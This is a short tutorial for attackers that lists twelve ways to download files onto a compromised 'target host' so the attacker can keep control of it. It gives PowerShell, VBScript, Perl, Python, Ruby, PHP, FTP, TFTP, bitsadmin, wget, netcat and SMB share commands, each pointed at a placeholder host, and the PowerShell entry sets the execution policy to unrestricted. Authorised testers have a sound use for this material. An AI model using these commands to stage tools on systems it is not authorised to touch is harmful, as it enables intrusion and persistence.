In our infiltration process, we usually need to send some files to the target host, to achieve the right to maintain, control and other purposes. This article will introduce 12 ways to download files.
-
PowerShell File
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")
C:\>powershell set-executionpolicy unrestricted
PS C:\> .\test.ps1
-
Visual Basic
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end with
C:>cscript test.vbs
-
Perl
#!perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
root@kali:~# perl test.pl
-
Python
#!python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
root@kali:~# python test.py
-
Ruby
#!ruby
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}
root@kali:~# ruby test.rb
-
PHP
#!/usr/bin/php
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>
root@kali:~# php test.php
-
FTP
ftp 127.0.0.1
username
password
get file
exit
-
TFTP
tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server
-
Bitsadmin
bitsadmin /transfer n http://domain/file c:\%homepath%\file
-
Wget
wget http://example.com/file
-
Netcat
cat file | nc -l 1234
nc host_ip 1234 > file
-
Windows Share
net use x: \\127.0.0.1\share /user:example.com\userID myPassword